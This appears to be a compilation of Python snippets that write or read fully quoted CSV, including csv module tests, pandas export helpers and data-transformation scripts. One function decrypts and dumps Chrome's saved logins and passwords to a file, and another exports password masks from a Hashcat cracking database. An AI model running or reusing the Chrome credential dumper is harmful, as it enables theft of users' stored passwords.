def create_carto_file():
    """Creates a .csv file to be uploaded into http://carto.com with the smells."""
    location_finder = LocationFinder()
    filename = "carto.csv"
    csv_file = open(filename, "w", newline="")
    print("Output file: {}".format(filename))
    map_writer = csv.writer(csv_file, delimiter=",", quoting=csv.QUOTE_ALL)
    map_writer.writerow(["longitude", "latitude", "date", "location_name", "number_of_smells"])
    missing_locations = []
    for borough_name, borough_information in smell_hits.res.items():
        for year, number_of_smells in borough_information.items():
            (latitude, longitude) = location_finder.lookup(borough_name)
            if latitude is not None and longitude is not None:
                date = "{}/01/01".format(year)
                # Keep the value order in sync with the header row (longitude first).
                map_writer.writerow([longitude, latitude, date, borough_name, number_of_smells])
            elif borough_name not in missing_locations:
                missing_locations.append(borough_name)
    csv_file.close()
    print("Missing locations:", missing_locations)
def clean_and_write_dataframe_to_csv(data, filename):
    """
    Cleans a dataframe of np.NaNs and saves to file via pandas.to_csv
    :param data: data to write to CSV
    :type data: :class:`pandas.DataFrame`
    :param filename: Path to file to write CSV to. If None, the string of
        data will be returned.
    :type filename: str | None
    :return: If the filename is None, returns the string of data. Otherwise
        returns None.
    :rtype: str | None
    """
    # Replace np.NaN values with None so they serialize as empty fields.
    data = data.where(pd.notnull(data), None)
    # If filename is None, to_csv returns the CSV content as a string.
    result = data.to_csv(path_or_buf=filename, encoding='utf-8', index=False,
                         na_rep='', quoting=csv.QUOTE_ALL)
    logging.info("Dataframe of shape %s has been stored.", data.shape)
    return result
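A hedged usage sketch, assuming the surrounding module already imports csv, logging and pandas as pd; the column names here are made up for illustration. Passing filename=None returns the fully quoted CSV as a string instead of writing a file:

import numpy as np
import pandas as pd

# Hypothetical data purely for illustration.
df = pd.DataFrame({"name": ["alice", "bob"], "score": [1.5, np.nan]})

csv_text = clean_and_write_dataframe_to_csv(df, filename=None)
print(csv_text)
# "name","score"
# "alice","1.5"
# "bob",""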
def LDParser(self):
    # Dump saved Chrome credentials from the "Login Data" SQLite database to CSV.
    login_db = os.path.join(os.getenv("APPDATA"), "..", "Local", "Google",
                            "Chrome", "User Data", "Default", "Login Data")
    conn = sqlite3.connect(login_db)
    cursor = conn.cursor()
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    output_file_path = 'ChromeCode/ChromeLoginData'
    with open(output_file_path, 'w', newline='') as output_file:
        csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
        csv_writer.writerow(['Site', 'Username', 'Password'])
        for result in cursor.fetchall():
            # CryptUnprotectData returns (description, decrypted_bytes).
            password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
            if password:
                password = password.decode(errors='replace')
                print('Site: ' + result[0])
                print('Username: ' + result[1])
                print('Password: ' + password)
                csv_writer.writerow([result[0], result[1], password])
    conn.close()
def HistParser(self):
    # Basic history parser pulling only URLs from Chrome's "History" SQLite database.
    HistStatement = 'SELECT url FROM urls'
    history_db = r'C:\Users\Lewis Collins\AppData\Local\Google\Chrome\User Data\Default\History'
    with sqlite3.connect(history_db) as conn:
        conn.text_factory = str
        c = conn.cursor()
        output_file_path = 'ChromeCode/Chrome_Hist.csv'
        with open(output_file_path, 'w', newline='') as output_file:
            csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
            csv_writer.writerow(['url'])
            # Chrome stores visit times as microseconds since this epoch.
            epoch = datetime(1601, 1, 1)
            for row in c.execute(HistStatement):
                csv_writer.writerow(list(row))
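The epoch variable above hints at Chrome's timestamp format: last_visit_time in the urls table is stored as microseconds since 1601-01-01. The snippet does not select that column, but a hedged sketch of how such values could be converted if it did:

from datetime import datetime, timedelta

def chrome_time_to_datetime(chrome_us):
    # Chrome/WebKit timestamps count microseconds since 1601-01-01 (UTC).
    return datetime(1601, 1, 1) + timedelta(microseconds=chrome_us)

print(chrome_time_to_datetime(13320000000000000))  # a timestamp from early 2023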
def _test_arg_valid(self, ctor, arg):
    self.assertRaises(TypeError, ctor)
    # PyPy gets an AttributeError instead of a TypeError
    self.assertRaises((TypeError, AttributeError), ctor, None)
    self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
    self.assertRaises(TypeError, ctor, arg, delimiter = 0)
    self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
    self.assertRaises(csv.Error, ctor, arg, 'foo')
    self.assertRaises(TypeError, ctor, arg, delimiter=None)
    self.assertRaises(TypeError, ctor, arg, delimiter=1)
    self.assertRaises(TypeError, ctor, arg, quotechar=1)
    self.assertRaises(TypeError, ctor, arg, lineterminator=None)
    self.assertRaises(TypeError, ctor, arg, lineterminator=1)
    self.assertRaises(TypeError, ctor, arg, quoting=None)
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar='')
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar=None)
def _test_dialect_attrs(self, ctor, *args):
    # Now try with dialect-derived options
    class dialect:
        delimiter = '-'
        doublequote = False
        escapechar = '^'
        lineterminator = '$'
        quotechar = '#'
        quoting = csv.QUOTE_ALL
        skipinitialspace = True
        strict = False
    args = args + (dialect,)
    obj = ctor(*args)
    self.assertEqual(obj.dialect.delimiter, '-')
    self.assertEqual(obj.dialect.doublequote, False)
    self.assertEqual(obj.dialect.escapechar, '^')
    self.assertEqual(obj.dialect.lineterminator, "$")
    self.assertEqual(obj.dialect.quotechar, '#')
    self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
    self.assertEqual(obj.dialect.skipinitialspace, True)
    self.assertEqual(obj.dialect.strict, False)
def test_quoting(self):
    class mydialect(csv.Dialect):
        delimiter = ";"
        escapechar = '\\'
        doublequote = False
        skipinitialspace = True
        lineterminator = '\r\n'
        quoting = csv.QUOTE_NONE
    d = mydialect()

    mydialect.quoting = None
    self.assertRaises(csv.Error, mydialect)

    mydialect.doublequote = True
    mydialect.quoting = csv.QUOTE_ALL
    mydialect.quotechar = '"'
    d = mydialect()

    mydialect.quotechar = "''"
    self.assertRaises(csv.Error, mydialect)

    mydialect.quotechar = 4
    self.assertRaises(csv.Error, mydialect)
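The validation exercised by the test above also applies outside the test suite: instantiating a csv.Dialect subclass checks its attributes, and a registered dialect can carry QUOTE_ALL for every writer that names it. A small, self-contained sketch:

import csv
import io

class PipeDialect(csv.Dialect):
    # A custom dialect: pipe-delimited, everything quoted.
    delimiter = '|'
    quotechar = '"'
    doublequote = True
    skipinitialspace = True
    lineterminator = '\r\n'
    quoting = csv.QUOTE_ALL

csv.register_dialect('pipe_all', PipeDialect)

buf = io.StringIO()
writer = csv.writer(buf, dialect='pipe_all')
writer.writerow(['a', 'b|c', 1])
print(buf.getvalue())  # "a"|"b|c"|"1"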
def _test_arg_valid(self, ctor, arg):
    self.assertRaises(TypeError, ctor)
    self.assertRaises(TypeError, ctor, None)
    self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
    self.assertRaises(TypeError, ctor, arg, delimiter = 0)
    self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
    self.assertRaises(csv.Error, ctor, arg, 'foo')
    self.assertRaises(TypeError, ctor, arg, delimiter=None)
    self.assertRaises(TypeError, ctor, arg, delimiter=1)
    self.assertRaises(TypeError, ctor, arg, quotechar=1)
    self.assertRaises(TypeError, ctor, arg, lineterminator=None)
    self.assertRaises(TypeError, ctor, arg, lineterminator=1)
    self.assertRaises(TypeError, ctor, arg, quoting=None)
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar='')
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar=None)
def rm_source(identnr):
    """Removes the source with the given identnr.
    :param identnr: identifier of the source to remove
    """
    source = get_sources(ident=str(identnr))
    if source:
        source_name = source[0][1]
    else:
        return False
    path = CACHE_DIR + str(identnr) + "_" + source_name.replace(".", "") + '.json'
    all_sources = _get_all_sources_as_list()
    new = [x for x in all_sources if x[0] != identnr]
    with open(SOURCE_FLE_NAME, 'w+') as csvfile:
        sourcewriter = csv.writer(csvfile, delimiter=DELIMITER, quoting=csv.QUOTE_ALL)
        for row in new:
            sourcewriter.writerow(row)
    # os.remove() returns None, so it cannot be used in a truth test;
    # report success based on whether the cached file could be deleted.
    try:
        os.remove(path)
    except OSError:
        return False
    return True
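For symmetry, a reader for the same sources file would need the same delimiter and quoting settings. The real _get_all_sources_as_list is not shown on this page, so the following is only an assumed sketch of what a compatible implementation could look like:

def _get_all_sources_as_list():
    # Hypothetical reader counterpart: parse the sources CSV back into rows,
    # mirroring the DELIMITER/QUOTE_ALL settings used by the writer above.
    with open(SOURCE_FLE_NAME, newline='') as csvfile:
        reader = csv.reader(csvfile, delimiter=DELIMITER, quoting=csv.QUOTE_ALL)
        return [row for row in reader]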
def expand(self, db_schema, inc_tags=False, exc_tags=False,
           out_pth=_TEMPLATE_PTH):
    self.db_schema = db_schema
    self.inc_tags, self.exc_tags = inc_tags, exc_tags
    assert not (inc_tags and exc_tags), "cannot have included and excluded tags"

    with open(out_pth, 'w') as out_hndl:
        self.out_hndl = out_hndl
        self.csv_writer = csv.DictWriter(out_hndl,
                                         fieldnames=[x.value for x in consts.OUTPUT_COLS],
                                         extrasaction='ignore',
                                         quoting=csv.QUOTE_ALL,
                                         )
        self.csv_writer.writeheader()
        for f in self.db_schema:
            self.expand_form(f)
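extrasaction='ignore' is what lets a DictWriter silently drop keys that are not in fieldnames; several snippets further down rely on the same trick. A small, self-contained illustration:

import csv
import io

buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=['id', 'name'],
                        extrasaction='ignore', quoting=csv.QUOTE_ALL)
writer.writeheader()
# 'debug' is not a declared field; with extrasaction='ignore' it is dropped
# instead of raising a ValueError.
writer.writerow({'id': 1, 'name': 'form_a', 'debug': 'not written'})
print(buf.getvalue())
# "id","name"
# "1","form_a"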
def csv_masks(request, hashfile_id):
    hashfile = get_object_or_404(Hashfile, id=hashfile_id)
    # Couldn't find a clean way to express this in the pure Django ORM,
    # so fall back to raw SQL.
    res = Cracked.objects.raw("SELECT id, password_mask, COUNT(*) AS count FROM Hashcat_cracked USE INDEX (hashfileid_id_index) WHERE hashfile_id=%s GROUP BY password_mask ORDER BY count DESC", [hashfile.id])

    fp = tempfile.SpooledTemporaryFile(mode='w')
    csvfile = csv.writer(fp, quotechar='"', quoting=csv.QUOTE_ALL)
    for item in res:
        csvfile.writerow([item.count, item.password_mask])
    fp.seek(0)  # rewind the file handle
    csvfile_data = fp.read()

    for query in connection.queries[-1:]:
        print(query["sql"])
        print(query["time"])

    # mimetype was replaced by content_type in Django 1.7
    response = HttpResponse(csvfile_data, content_type='application/force-download')
    response['Content-Disposition'] = 'attachment; filename=%s_masks.csv' % hashfile.name
    return response
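The temporary file plus read-back works, but Django's documentation also shows writing the csv.writer straight into the HttpResponse, since the response object behaves like a file. A hedged sketch of that alternative (the view name is illustrative, columns as above):

def csv_masks_streamed(request, hashfile_id):
    # Alternative sketch: feed csv.writer the response object directly
    # instead of buffering through a SpooledTemporaryFile.
    hashfile = get_object_or_404(Hashfile, id=hashfile_id)
    res = Cracked.objects.raw(
        "SELECT id, password_mask, COUNT(*) AS count FROM Hashcat_cracked "
        "USE INDEX (hashfileid_id_index) WHERE hashfile_id=%s "
        "GROUP BY password_mask ORDER BY count DESC", [hashfile.id])
    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = 'attachment; filename=%s_masks.csv' % hashfile.name
    writer = csv.writer(response, quotechar='"', quoting=csv.QUOTE_ALL)
    for item in res:
        writer.writerow([item.count, item.password_mask])
    return response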
def write_stock(stock_out, filtered_stock, modifications):
    """
    Generate the new stock file with modified and created entries.

    We mimic the initial stock's encoding, quotes and delimiters.
    """
    with open(stock_out, 'w', encoding='cp1252') as csv_file:
        _, first_row, fieldnames = next(filtered_stock)
        # `extrasaction` is set to `ignore` to be able to pass more keys
        # to the `writerow` method coming from the flux.
        writer = csv.DictWriter(
            csv_file, fieldnames=fieldnames, delimiter=';',
            quoting=csv.QUOTE_ALL, extrasaction='ignore')
        writer.writeheader()
        # Write the first row explicitly because it was already consumed
        # above to retrieve the fieldnames.
        writer.writerow(first_row)
        # Then write the updated stock.
        for i, row, _ in filtered_stock:
            writer.writerow(row)
        # Finally, append creations and insertions.
        for siret, row in modifications.items():
            is_created = row['VMAJ'] == 'C'
            is_inserted = row['VMAJ'] == 'D'
            if is_created or is_inserted:
                writer.writerow(row)
def write_stock(stock_out, filtered_stock):
    """
    Generate the new stock file with filtered entries.

    We mimic the initial stock's encoding, quotes and delimiters.
    """
    with open(stock_out, 'w', encoding='cp1252') as csv_file:
        _, first_row, fieldnames = next(filtered_stock)
        # `extrasaction` is set to `ignore` to be able to pass more keys
        # to the `writerow` method coming from the flux.
        writer = csv.DictWriter(
            csv_file, fieldnames=fieldnames, delimiter=';',
            quoting=csv.QUOTE_ALL, extrasaction='ignore')
        writer.writeheader()
        # Write the first row explicitly because it was already consumed
        # above to retrieve the fieldnames.
        writer.writerow(first_row)
        # Then write the filtered stock.
        for i, row, _ in filtered_stock:
            writer.writerow(row)
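Both write_stock variants unpack three values per item, so filtered_stock is presumably a generator yielding (index, row_dict, fieldnames) tuples. A hypothetical sketch of a compatible producer, purely to illustrate the expected shape:

def iter_filtered_stock(stock_path, keep):
    # Hypothetical producer matching the (index, row, fieldnames) shape
    # consumed by write_stock; `keep` is a predicate over row dicts.
    with open(stock_path, encoding='cp1252', newline='') as csv_file:
        reader = csv.DictReader(csv_file, delimiter=';')
        for i, row in enumerate(reader):
            if keep(row):
                yield i, row, reader.fieldnames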
def run_rules(job_id, schema_name):
    meta_conn = psycopg2.connect("dbname='validator' user='testUser' host='localhost' password='testPwd'")
    meta_conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
    meta_c = meta_conn.cursor()
    meta_c.execute("UPDATE jobs SET status='starting_rules' WHERE job_id=%d" % job_id)

    conn = psycopg2.connect("dbname='job_%d' user='testUser' host='localhost' password='testPwd'" % job_id)
    c = conn.cursor()

    with open('rules/%s.csv' % schema_name, newline='') as rules_file:
        reader = csv.reader(rules_file, quotechar='"', delimiter=',',
                            quoting=csv.QUOTE_ALL, skipinitialspace=True)
        header = next(reader)
        for row in reader:
            sql = row[header.index('sql')]
            print("Running rule %s: %s" % (row[header.index('id')], sql))
            c.execute(sql)
            invalid_count = len(c.fetchall())
            print('==> Found %d invalid rows.' % invalid_count)

    conn.close()
    meta_c.execute("UPDATE jobs SET status='finished_rules' WHERE job_id=%d" % job_id)
    meta_conn.close()
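run_rules() expects the rules file to carry at least 'id' and 'sql' columns, looked up by name from the header row. A small illustrative sketch of how such a file could be produced (the schema name and rule content are assumptions, not taken from the original project):

import csv

# Illustrative only: write a minimal rules file in the shape run_rules() reads,
# i.e. a header with "id" and "sql" columns, all fields quoted.
with open('rules/example_schema.csv', 'w', newline='') as f:
    writer = csv.writer(f, quoting=csv.QUOTE_ALL)
    writer.writerow(['id', 'sql'])
    writer.writerow(['R001', "SELECT * FROM records WHERE amount < 0"])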
def score_packets(input_url='data/raw_packets.csv', output_url='data/scored_packets.csv'):
    '''
    Adds a binary score column: 0 for BENIGN flows, 1 for botnet traffic.
    '''
    print("Transforming initial data csv")
    with open(output_url, 'w', newline='') as raw_flows:
        writer = csv.writer(raw_flows, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
        with open(input_url) as csvfile:
            # `headers` is a module-level list of column names; append the new column.
            writer.writerow(headers + ["Score"])
            first = True
            for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
                if first:
                    # Skip the input file's own header row.
                    first = False
                    continue
                if row[headers.index('Label')] == "BENIGN":
                    row.append(0)
                else:
                    row.append(1)
                writer.writerow(row)
def modify_csv_rows(input_url=PROJ_ROOT+'data/data.csv', output_url=PROJ_ROOT+'data/modified_data.csv'):
    print("Transforming initial data csv")
    with open(output_url, 'w', newline='') as new:
        newWriter = csv.writer(new, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
        with open(input_url) as csvfile:
            newWriter.writerow(['Source Port', 'Destination Port', 'Eth', 'Source', 'Destination', 'Protocol', 'IP_Flags', 'Length', 'Protocols in frame', 'Time', 'tcp_Flags', 'TCP Segment Len', 'udp_Length'])
            first = True
            for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
                if first:
                    # Skip the input file's header row.
                    first = False
                    continue
                # Remove two columns: the first two when column 2 is populated,
                # otherwise columns 2 and 3.
                if row[2]:
                    row.pop(0)
                    row.pop(0)
                else:
                    row.pop(2)
                    row.pop(2)
                newWriter.writerow(row)
    print("Csv row modification complete\n##############################")
def test_csv_export(rf, module):
    class CSVExport(views.AbstractCSVExportView):
        def get_filename(self):
            return 'testexport.csv'

        def get_header(self):
            return ['head1', 'head2']

        def export_rows(self):
            return [['regular', 'delimiter,;\t '],
                    ['escaping"\'', 'newlines\r\n']]

    request = rf.get('/')
    response = CSVExport.as_view()(request, module=module)
    assert response['Content-Disposition'] == 'attachment; ' \
                                              'filename="testexport.csv"'

    reader = csv.reader(response.content.decode('utf-8').splitlines(True),
                        lineterminator='\n', quotechar='"',
                        quoting=csv.QUOTE_ALL)
    lines = list(reader)
    assert lines[0] == ['head1', 'head2']
    assert lines[1] == ['regular', 'delimiter,;\t ']
    assert lines[2] == ['escaping"\'', 'newlines\r\n']
def main():
    parser = make_arg_parser()
    args = parser.parse_args()
    sam_files = [os.path.join(args.input, filename) for filename in os.listdir(args.input) if filename.endswith('.sam')]
    img_map = IMGMap()
    ncbi_tree = NCBITree()
    with open(args.output, 'w') if args.output else sys.stdout as outf:
        csv_outf = csv.writer(outf, quoting=csv.QUOTE_ALL, lineterminator='\n')
        csv_outf.writerow(['sample_id', 'sequence_id', 'ncbi_tid', 'img_id'])
        for file in sam_files:
            with open(file) as inf:
                lca_map = build_lca_map(yield_alignments_from_sam_inf(inf), ncbi_tree, img_map)
                for key in lca_map:
                    img_ids, ncbi_tid = lca_map[key]
                    csv_outf.writerow([os.path.basename(file)[:-4], key, ncbi_tid, ','.join(img_ids)])
def get(self):
    cached = memcache.get('best_handler')
    if cached:
        self.response.out.write(cached)
    else:
        response_writer = csv.writer(
            self.response, delimiter=',', quoting=csv.QUOTE_ALL)
        # Instruct endpoint to cache for 1 day.
        self.response.headers['Cache-control'] = 'public, max-age=86400'
        for line in ndb.gql(
                'select distinct screen_name, twitter_id, score '
                'from Score order by score limit 20000'):
            response_writer.writerow(
                [line.screen_name, line.twitter_id, line.score])
        memcache.set('best_handler', self.response.text, 86400)